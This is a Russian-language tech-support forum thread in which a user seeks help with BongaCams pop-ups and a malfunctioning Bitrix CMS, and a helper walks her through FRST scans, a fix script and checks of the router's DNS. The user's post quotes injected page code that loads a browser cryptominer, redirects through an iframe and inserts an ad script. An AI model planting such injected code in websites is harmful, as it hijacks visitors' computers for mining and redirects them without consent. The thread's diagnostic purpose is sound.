Высплывающее окно Bonga Cams в браузере + консоль рабочего сайта работает со сбоями

[Жанна Байкова]

Добрый день!
 
У меня возникла проблема на рабочем компьютере: на некоторых страницах в Chrome появляется баннер порно-портала BongaCams. Примечательно, что такой баннер появляется в браузерах и у моих коллег.
 
Из-за браузерного вируса с перебоями работает CMS 1С Битрикс, через которую я размещаю материалы на корпоративном сайте. Сайт иногда работает некорректно: при нажатии на кнопку или ссылку может перебросить в другой раздел. Если нажать Ctrl+U, иногда появляется следующий код:
 

 

<html>
<head>
  <script src="https://xmr.omine.org/assets/v7.js"></script>
  <script>
    OMINEId("f6c7f38e473a4a0a9d9d1f340cb260a3","-1");
    throttleMiner=30;
  </script> 
</head>
<body>
  <div >
     <iframe src="http://www.r-id.ru/"width="100%" height="100%" id="demo_frame" scrolling="no" frameborder="0"></iframe>
  </div>
<script>
  var i = document.getElementById('demo_frame');
  var t; 
 
  function d() {
    if (navigator.appName=="Opera") {
      i.src = "http://www.r-id.ru//"
    }
    clearInterval(t);
    t = setInterval("m()",1000);
  }    
   
  function m() {
                var c = i.contentWindow || i.contentDocument;
                var newheight = c.document.body.scrollHeight;
                if (i.height != newheight) {i.height = newheight};
  }
  
  onload = d;
  onerror = function() {window.location.href = "http://www.r-id.ru/";}; 
  i.onerror = function() {window.location.href = "http://www.r-id.ru/";}
 
  if(Math.random()<0.1) {document.write("<script id='IM_JS' type='text\/javascript' src='https:\/\/promo-bc.com\/promo.php?c=616369&type=im&size=160x320&name=opc'><\/script>");}
 
</script>
 
</body>
</html>

 

 
Если перейти по ссылке [ссылка] из кода страницы, то попадаешь на сайт майнеров.
 
Консоль работает со сбоями: я не всегда могу загрузить картинку, некоторые функции не работают, иногда процесс работы не сохраняется при нажатии, приходится делать все заново. Поэтому прежде чем сохранять материал, приходится копировать код.
 
Обратилась за помощью к разработчикам сайта. Они проверили код сайта, работу консоли и со своей стороны ничего не нашли.
 
Открывала сайт на домашнем компьютере, консоль работала исправно.
 
Тогда на рабочем компьютере я запустила проверку с помощью Kaspersky Endpoint Security для Windows 11.0.0.6499. Антивирус не выявил ничего. 
 
После этого я установила Malwarebytes AdwCleaner. После чистки консоль начала время от времени работать (с переменным успехом), однако баннер BongaCams все еще всплывает в Chrome. Я опробовала работать в CMS Битрикс в других баузерах - там консоль так же работает с переменным успехом (то нормально, то сбоит).
 
Я позвала на помощь нашего сотрудника технического отдела, который по совместительству еще иногда исполняет обязанности сисадмина. Он удалил некоторые программы, которые я не использую, но проблему это решить не помогло.
 
После этого я установила Чистилку: https://chistilka.com/
 
Утилита пометила файл ecf00c38dc807e105d881c433a6b455dd2c606b6, который находится в C:\ProgramData, как подозрительный. Увы, для продолжения работы программа требует платной подписки, поэтому дальше я ничего с этим файлом сделать не могу. Решила погуглить, что это за файл, но так и не поняла, является ли он действительно вредоносным или нет, удалять его пока не стала.
 
Логи, первую и последнюю проверку AdwCleaner прикрепляю к теме.
 
Надеюсь, что Ваши специалисты помогут мне наконец решить проблему.
 
Заранее большое спасибо!

CollectionLog-2019.02.12-12.04.zip

AdwCleanerS05.txt

AdwCleanerS00.txt

Изменено 12 февраля, 2019 пользователем Sandor
Убрал ссылку

[Sandor]

Здравствуйте!

 

для продолжения работы программа требует платной подписки

Вот и удалите её.

 

Также очистите следы от прежней установки Avast - Чистка системы после некорректного удаления антивируса.

 

Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

 

Примечание: необходимо выбрать версию, совместимую с вашей операционной системой. Если вы не уверены, какая версия подойдет для вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на вашей системе.

Когда программа запустится, нажмите Yes для соглашения с предупреждением.

 

Нажмите кнопку Scan.

После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.

Подробнее читайте в этом руководстве.

[Bigudi69]

Спасибо Вам большое! Папки с Avast вычистила. Отчеты прикрепляю.

FRST.txt

Addition.txt

[Sandor]

• Отключите до перезагрузки антивирус.
• Выделите следующий код:

  Start::
  CreateRestorePoint:
  GroupPolicy: Restriction ? <==== ATTENTION
  GroupPolicy\User: Restriction ? <==== ATTENTION
  ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
  Task: {8694C82A-F8B2-47A1-9F17-3615116D7674} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\AVAST Software\Overseer\overseer.exe (AVAST Software s.r.o. -> AVAST Software)
  AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxlctlfudivq`qsp`28hfm [0]
  AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxlctlfudivq`qsp`29hfm [0]
  EmptyTemp:
  Reboot:
  End::

• Скопируйте выделенный текст (правой кнопкой - Копировать).
• Запустите FRST (FRST64) от имени администратора.
• Нажмите Fix один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.

Компьютер будет перезагружен автоматически.

 

Подробнее читайте в этом руководстве.

 

 

Примечательно, что такой баннер появляется в браузерах и у моих коллег

Вы с коллегами к сети подключены через роутер?

[Bigudi69]

Вы с коллегами к сети подключены через роутер?

 

 

Как объяснил мне наш сисадмин, мы все подключены к двум коммутаторам (кроме беспроводных клиентов), а оба коммутатора подключены к роутеру (который также является четырёхпортовым коммутатором, который не используется, и точкой доступа, к которой подключена часть беспроводных клиентов).

 

Благодарю Вас за инструкции, надеюсь, все получится.

 

Текст без проблем копируется с помощью Ctrl+C Я не настолько ламер..)

Прикрепляю фикс-лог.

Fixlog.txt

Изменено 14 февраля, 2019 пользователем Bigudi69

[Sandor]

на некоторых страницах в Chrome появляется баннер

Что сейчас с этим?

[Bigudi69]

Увы, проблема осталась: баннеры все еще появляются и CMS-ка по-прежнему работает с перебоями... В общем, пока не сработало.

Изменено 14 февраля, 2019 пользователем Bigudi69

[Sandor]

Проявляется только в Хроме? Проверьте в Internet Explorer и сообщите.

[Bigudi69]

Нет, не только в Хроме. В Опере и Эксплорере тоже.

[Sandor]

Тот, кто имеет доступ к роутеру, пусть проверит его настройки или проделает следующее:

Сделайте аппаратный сброс настроек роутера на заводские, введите правильные настройки, смените пароль на вход в настройки роутера на сложный.

 

После этого вам нужно очистить кеш и куки всех браузеров.

Изменено 15 февраля, 2019 пользователем Sandor

[Bigudi69]

По словам сисадмина, сделать это можно, но потом весь офис как минимум несколько дней будет сидеть без интернета и телефонии... 

[Sandor]

пусть проверит его настройки

Скорее всего некоторые из них (конкретно DNS) указаны неверно. Это ведь ему не должно быть сложно сделать.

[Bigudi69]

Сисадмин сообщает, что ошибок быть здесь не может. В нашем случае DNS-сервер поставляется провайдером, прописан на DHCP-сервере и раздается всем DHCP-клиентам. Статические маршруты в системном реестре проверены.

[Sandor]

Пусть всё-таки перепроверит настройки роутера.